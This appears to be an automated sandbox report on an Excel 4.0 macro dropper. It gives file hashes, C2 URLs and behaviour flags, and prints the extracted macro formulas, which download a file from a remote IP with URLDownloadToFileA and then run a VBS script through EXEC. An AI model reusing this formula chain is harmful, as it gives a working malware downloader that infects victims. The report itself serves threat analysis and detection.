General

  • Target

    1c959fa7cc8a7558dea798033c44a279

  • Size

    6KB

  • Sample

    231221-2v7vtsfhgn

  • MD5

    1c959fa7cc8a7558dea798033c44a279

  • SHA1

    22c07d1124dffb65e20a94cf1d79b7e1e4883e75

  • SHA256

    0d4c43a954f7a7aec20289956f4333c3d59a15697cedb0872f2fca4a6cb2236b

  • SHA512

    af19620066d2e0be64149960446e0ce8889dabcbc13d49c5b0541b57997306faeb917cfea7dfb1fadfc59851269c0ffb639e14c0e12e21a0de9b9f3a48a79585

  • SSDEEP

    192:NDSduSrbrA2OmmfRW8UhHFBFYuwb98y+v+ovc:NGuwM2wQ1FYhb98y+H0

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      1c959fa7cc8a7558dea798033c44a279

    • Size

      6KB

    • MD5

      1c959fa7cc8a7558dea798033c44a279

    • SHA1

      22c07d1124dffb65e20a94cf1d79b7e1e4883e75

    • SHA256

      0d4c43a954f7a7aec20289956f4333c3d59a15697cedb0872f2fca4a6cb2236b

    • SHA512

      af19620066d2e0be64149960446e0ce8889dabcbc13d49c5b0541b57997306faeb917cfea7dfb1fadfc59851269c0ffb639e14c0e12e21a0de9b9f3a48a79585

    • SSDEEP

      192:NDSduSrbrA2OmmfRW8UhHFBFYuwb98y+v+ovc:NGuwM2wQ1FYhb98y+H0

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks